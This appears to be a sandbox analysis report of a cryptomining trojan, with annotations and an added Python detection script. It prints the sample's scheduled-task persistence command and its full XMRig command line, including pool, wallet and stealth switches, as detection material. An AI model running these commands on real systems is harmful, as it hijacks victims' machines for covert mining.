Analysis
- max time kernel: 61s
- max time network: 180s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 10-06-2021 10:51
- Static task: static1
- Behavioral task: behavioral1
  - Sample: SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe
  - Resource: win7v20210408
General
- Target: SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe
- Size: 2.2MB
- MD5: bd8eaab97c1724a00678af57bfa1c060
- SHA1: 075a96004a9a974ffd40254fbf36049cc9f0f940
- SHA256: 1ed5337566938228ee9afcad29b1f722d55f4f8172a3157af4d4ad913541b2ea
- SHA512: d085a9c1a937c22e8bd2ed73e29cdc662723d88c83e6a0b8a7b90b67e61c92e8ae241c3237d51f1ad591e4f57cc0ec44de6d2c70f71e0af36e47dec79f514bda
Signatures
- XMRig Miner Payload (3 IoCs)
  Resource / YARA rule:
  - behavioral1/memory/1588-90-0x0000000140000000-0x0000000140758000-memory.dmp: xmrig
  - behavioral1/memory/1588-91-0x00000001402EB66C-mapping.dmp: xmrig
  - behavioral1/memory/1588-93-0x0000000140000000-0x0000000140758000-memory.dmp: xmrig
  All three hits are in PID 1588 (explorer.exe), the process that Services.exe (PID 1564) targets with SetThreadContext below. No separate miner executable appears in the dropped-files list; the XMRig image exists only in explorer.exe's memory in this run.
- Executes dropped EXE (3 IoCs)
  - PID 1580: sihost64.exe
  - PID 1564: Services.exe
  - PID 920: sihost64.exe
- Loads dropped DLL (1 IoC)
  - PID 748: SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP)
  The only external endpoint visible in this report is the public mining pool (pool.supportxmr.com:3333) on the explorer.exe command line.
- Suspicious use of SetThreadContext (1 IoC)
  - PID 1564 (Services.exe) set the thread context of PID 1588 (explorer.exe)
  Together with the 16 WriteProcessMemory calls from 1564 into 1588 and the xmrig YARA hits in 1588's memory, this is the injection step (process-hollowing pattern) that places the miner inside a legitimately started explorer.exe.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic description calls this likely ransomware behaviour; for this sample the payload is a cryptominer, so treat it as a low-weight indicator here.
- Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution. Both IoCs register the same task: name "Services", trigger onlogon, run level highest, action C:\Users\Admin\AppData\Local\Temp\Services.exe (created once by the sample, PID 988, and again by Services.exe itself, PID 836).
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  - PID 748: SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe (2)
  - PID 1564: Services.exe (2)
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  - SeDebugPrivilege: PID 748 (SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe), PID 1580 (sihost64.exe), PID 1564 (Services.exe), PID 920 (sihost64.exe)
  - SeLockMemoryPrivilege: PID 1588 (explorer.exe), twice
  SeLockMemoryPrivilege is the privilege XMRig enables to back RandomX with large pages; a stock explorer.exe has no reason to request it, so this entry corroborates the in-memory miner in PID 1588.
- Suspicious use of WriteProcessMemory (39 IoCs)
  Source PID -> target PID (number of writes):
  - 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe -> 368 cmd.exe (3)
  - 368 cmd.exe -> 988 schtasks.exe (3)
  - 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe -> 1580 sihost64.exe (4)
  - 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe -> 1564 Services.exe (3)
  - 1564 Services.exe -> 964 cmd.exe (3)
  - 964 cmd.exe -> 836 schtasks.exe (3)
  - 1564 Services.exe -> 920 sihost64.exe (4)
  - 1564 Services.exe -> 1588 explorer.exe (16)
  Every ordinary parent/child pair shows 3 or 4 writes; the 16 writes from Services.exe into explorer.exe are the outlier and match the injected 7.3MB image reported under the XMRig Miner Payload signature.
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe (PID 748)
  Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe"
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\cmd.exe (PID 368)
    Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\schtasks.exe (PID 988)
      Command line: schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
      - Creates scheduled task(s)
  - [2] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe (PID 1580)
    Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Users\Admin\AppData\Local\Temp\Services.exe (PID 1564)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Services.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\cmd.exe (PID 964)
      Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\schtasks.exe (PID 836)
        Command line: schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        - Creates scheduled task(s)
    - [3] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe (PID 920)
      Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\explorer.exe (PID 1588)
      Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=4AAkh5so8qhiNxHwRe7JdJcZTibJQKizdZ5ChQMMdRA3g1cz16NodDGTe2y6Xb4kBj4wHvV8v1pwsN1KxNB4wmVWBRhhHKN --pass=WAVEMINER9961 --cpu-max-threads-hint=10 --donate-level=5 --cinit-idle-wait=30 --cinit-idle-cpu=30 --cinit-stealth
      - Suspicious use of AdjustPrivilegeToken

Reading the tree: Services.exe (PID 1564) is a byte-identical copy of the submitted sample (same MD5/SHA1/SHA256/SHA512 in the dropped-files list), so the second level repeats the first: re-register the logon task, start sihost64.exe again from %APPDATA%\Microsoft\Libs, then start explorer.exe and overwrite it with the miner (SetThreadContext plus 16 WriteProcessMemory calls). The command line handed to explorer.exe is a complete XMRig configuration: RandomX (--algo=rx/0), pool pool.supportxmr.com:3333, a 95-character standard Monero address as the username, WAVEMINER9961 as the worker password, --cpu-max-threads-hint=10 (a percentage cap on worker threads, not a thread count), a 5% developer donation, and idle/CPU gating (--cinit-idle-wait=30, --cinit-idle-cpu=30, --cinit-stealth). The --cinit-* switches are not part of upstream XMRig's option set; they belong to the loader wrapped around the miner. A real explorer.exe never carries arguments like these, which makes the command line itself a high-confidence detection.
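The two behaviours in the tree that a detection engineer would key on are the logon task whose action lives in a user-writable directory and a Windows system binary started with mining arguments. The following Python is an added example, not code from the sandbox vendor or from this page: it takes Sysmon-style process-creation events (constructed here from the command lines above) and flags both. The Monero address pattern, the pool regex, the list of user-writable directories and the event field names are assumptions made for the example.

```python
"""Process-creation triage for the two behaviours in this report: a logon
scheduled task pointing at a user-writable path, and a Windows system binary
(explorer.exe) started with XMRig-style mining arguments.

Added example, not code from the sandbox vendor or the page. The address and
pool patterns, the directory list and the event layout are assumptions."""
import re

# Standard Monero mainnet address: '4', then one of 0-9/A/B, then 93 base58
# characters (95 in total). Integrated and sub-addresses use other prefixes.
MONERO_ADDR = re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$")
# host:port, optionally with a stratum scheme.
POOL_URL = re.compile(r"^(?:stratum\+(?:tcp|ssl)://)?[\w.-]+:\d{2,5}$")
# Switches worth pulling out. The --cinit-* ones are not upstream XMRig options;
# they come from the loader wrapped around the miner (assumption from this sample).
MINER_SWITCHES = {
    "--url", "-o", "--user", "-u", "--pass", "-p", "--algo", "-a",
    "--donate-level", "--randomx-mode", "--cpu-max-threads-hint",
    "--cinit-find-x", "--cinit-stealth", "--cinit-idle-wait", "--cinit-idle-cpu",
}
# Directories an unprivileged user can write to (assumed list); a highest-privilege
# logon task whose action lives here is a persistence red flag.
USER_WRITABLE = (r"\appdata\local\temp", r"\appdata\roaming", r"\users\public", r"\programdata")
SYSTEM_BINARIES = {"explorer.exe", "svchost.exe", "dllhost.exe", "conhost.exe", "notepad.exe"}
TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')


def tokenize(cmdline):
    """Split a Windows command line, honouring "..." and '...' quoting."""
    return [t.strip("\"'") for t in TOKEN.findall(cmdline)]


def miner_indicators(cmdline):
    """Extract mining switches; a value may be attached with '=' or be the next token."""
    toks = tokenize(cmdline)
    found = {}
    for i, tok in enumerate(toks):
        key, _, val = tok.partition("=") if tok.startswith("-") else (tok, "", "")
        if key not in MINER_SWITCHES:
            continue
        if not val and i + 1 < len(toks) and not toks[i + 1].startswith("-"):
            val = toks[i + 1]
        found[key] = val or True  # flag-only switches are recorded as True
    wallet = found.get("--user") or found.get("-u")
    pool = found.get("--url") or found.get("-o")
    return {
        "switches": found,
        "pool": pool if isinstance(pool, str) and POOL_URL.match(pool) else None,
        "monero_wallet": wallet if isinstance(wallet, str) and MONERO_ADDR.match(wallet) else None,
    }


def schtasks_persistence(cmdline):
    """Describe a 'schtasks /create' in a command line, or return None."""
    toks = tokenize(cmdline)
    low = [t.lower() for t in toks]
    if not any("schtasks" in t for t in low) or "/create" not in low:
        return None
    opts = {low[i]: toks[i + 1] for i in range(len(toks) - 1) if low[i] in ("/sc", "/rl", "/tn", "/tr")}
    target = opts.get("/tr", "")
    return {
        "task_name": opts.get("/tn"),
        "trigger": opts.get("/sc", "").lower(),
        "run_level": opts.get("/rl", "").lower(),
        "target": target,
        "user_writable": any(p in target.lower() for p in USER_WRITABLE),
    }


def triage(events):
    """events: dicts with pid, image, cmdline (Sysmon event 1 style). Returns (pid, reason) pairs."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        ind = miner_indicators(ev["cmdline"])
        if ind["pool"] or ind["monero_wallet"]:
            how = ("system binary started with miner arguments (injection/hollowing likely)"
                   if image in SYSTEM_BINARIES else "miner arguments")
            findings.append((ev["pid"], f"{image}: {how}; pool={ind['pool']}"))
        task = schtasks_persistence(ev["cmdline"])
        if task and task["trigger"] == "onlogon" and task["user_writable"]:
            findings.append((ev["pid"], f"{image}: logon task {task['task_name']!r} runs "
                                        f"{task['target']} at run level {task['run_level']}"))
    return findings


# Constructed events mirroring the process tree above (command lines copied from it).
EXPLORER_CMDLINE = (
    "C:\\Windows\\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 "
    "--randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 "
    "--url=pool.supportxmr.com:3333 "
    "--user=4AAkh5so8qhiNxHwRe7JdJcZTibJQKizdZ5ChQMMdRA3g1cz16NodDGTe2y6Xb4kBj4wHvV8v1pwsN1KxNB4wmVWBRhhHKN "
    "--pass=WAVEMINER9961 --cpu-max-threads-hint=10 --donate-level=5 "
    "--cinit-idle-wait=30 --cinit-idle-cpu=30 --cinit-stealth")
SCHTASKS_ARGS = ("schtasks /create /f /sc onlogon /rl highest /tn \"Services\" "
                 "/tr '\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Services.exe\"'")
SAMPLE_EVENTS = [
    {"pid": 748, "image": "C:\\Users\\Admin\\AppData\\Local\\Temp\\SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe",
     "cmdline": "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe\""},
    {"pid": 368, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c " + SCHTASKS_ARGS + " & exit"},
    {"pid": 988, "image": "C:\\Windows\\system32\\schtasks.exe", "cmdline": SCHTASKS_ARGS},
    {"pid": 1564, "image": "C:\\Users\\Admin\\AppData\\Local\\Temp\\Services.exe",
     "cmdline": "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Services.exe\""},
    {"pid": 1588, "image": "C:\\Windows\\explorer.exe", "cmdline": EXPLORER_CMDLINE},
]

if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_EVENTS):
        print(pid, reason)
```

Run against the constructed events it reports PIDs 368 and 988 (the task registration, once via cmd.exe and once via schtasks.exe) and 1588 (explorer.exe with a pool and wallet). The wallet check is deliberately strict: matching the exact Monero address shape avoids flagging every --user value, while the pool check alone is enough to catch other coins.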
Downloads
- C:\Users\Admin\AppData\Local\Temp\Services.exe
  MD5: bd8eaab97c1724a00678af57bfa1c060
  SHA1: 075a96004a9a974ffd40254fbf36049cc9f0f940
  SHA256: 1ed5337566938228ee9afcad29b1f722d55f4f8172a3157af4d4ad913541b2ea
  SHA512: d085a9c1a937c22e8bd2ed73e29cdc662723d88c83e6a0b8a7b90b67e61c92e8ae241c3237d51f1ad591e4f57cc0ec44de6d2c70f71e0af36e47dec79f514bda
  Identical to the submitted sample (all four hashes match): the sample copies itself to %TEMP%\Services.exe and points the "Services" logon task at that copy.
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
  MD5: 0c0195c48b6b8582fa6f6373032118da
  SHA1: d25340ae8e92a6d29f599fef426a2bc1b5217299
  SHA256: 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
  SHA512: ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
  A kernel driver dropped into a user-writable directory next to sihost64.exe. No signature in this run records it being loaded; check its hashes against the WinRing0 driver that XMRig-based miners carry for MSR access (the --randomx-no-rdmsr switch on the miner command line belongs to that feature).
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5: fcdf214645952c4af042b2690645ee04
  SHA1: 6fc7c6e6185dcc28d2a8d87f5d1cfff937096db2
  SHA256: 22a83e5b94e5b130c870026676b2e03591f24c32b1cbcbfa4eada0f9d5e82ebe
  SHA512: daa1ca58a33756a9142336b9cb79abe529ddaf74ef4c46d33403c7bde7b7b5a7f213445c502f876d7c14d6845f6e1df39930eb410611f0d958a7036f88c79a79
  Executed twice (PIDs 1580 and 920), once by the sample and once by Services.exe; the file name imitates the legitimate Windows sihost.exe but the path under %APPDATA%\Microsoft\Libs is not one Windows uses.
Memory dumps
- PID 368 (cmd.exe): memory/368-64-0x0000000000000000-mapping.dmp
- PID 748 (SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe):
  - memory/748-60-0x000000013F5B0000-0x000000013F5B1000-memory.dmp (4KB)
  - memory/748-62-0x000000001C0F0000-0x000000001C31A000-memory.dmp (2.2MB, the same size as the sample file)
  - memory/748-63-0x000000001B980000-0x000000001B982000-memory.dmp (8KB)
- PID 836 (schtasks.exe): memory/836-81-0x0000000000000000-mapping.dmp
- PID 920 (sihost64.exe):
  - memory/920-82-0x0000000000000000-mapping.dmp
  - memory/920-86-0x0000000001040000-0x0000000001041000-memory.dmp (4KB)
  - memory/920-88-0x0000000000FE0000-0x0000000000FE1000-memory.dmp (4KB)
- PID 964 (cmd.exe): memory/964-80-0x0000000000000000-mapping.dmp
- PID 988 (schtasks.exe): memory/988-65-0x0000000000000000-mapping.dmp
- PID 1564 (Services.exe):
  - memory/1564-69-0x0000000000000000-mapping.dmp
  - memory/1564-73-0x000000013F200000-0x000000013F201000-memory.dmp (4KB)
  - memory/1564-79-0x000000001BDE0000-0x000000001BDE2000-memory.dmp (8KB)
  - memory/1564-89-0x00000000022F0000-0x00000000022FA000-memory.dmp (40KB)
- PID 1580 (sihost64.exe):
  - memory/1580-66-0x0000000000000000-mapping.dmp
  - memory/1580-75-0x00000000012B0000-0x00000000012B1000-memory.dmp (4KB)
  - memory/1580-77-0x0000000004DA0000-0x0000000004DA1000-memory.dmp (4KB)
- PID 1588 (explorer.exe):
  - memory/1588-90-0x0000000140000000-0x0000000140758000-memory.dmp (7.3MB)
  - memory/1588-91-0x00000001402EB66C-mapping.dmp
  - memory/1588-92-0x00000000000E0000-0x0000000000100000-memory.dmp (128KB)
  - memory/1588-93-0x0000000140000000-0x0000000140758000-memory.dmp (7.3MB)
  - memory/1588-94-0x0000000000140000-0x0000000000160000-memory.dmp (128KB)
  - memory/1588-95-0x0000000000140000-0x0000000000160000-memory.dmp (128KB)
  The 7.3MB region at 0x140000000 is the injected miner image (both dumps of it hit the xmrig YARA rule above). 0x140000000 is the default image base the MSVC linker assigns to 64-bit executables, not where an ASLR-enabled explorer.exe is loaded, so a module sitting there inside explorer.exe is itself an indicator. The mapping entry at 0x1402EB66C lies 0x2EB66C into that region and is consistent with the thread start address that Services.exe set through SetThreadContext.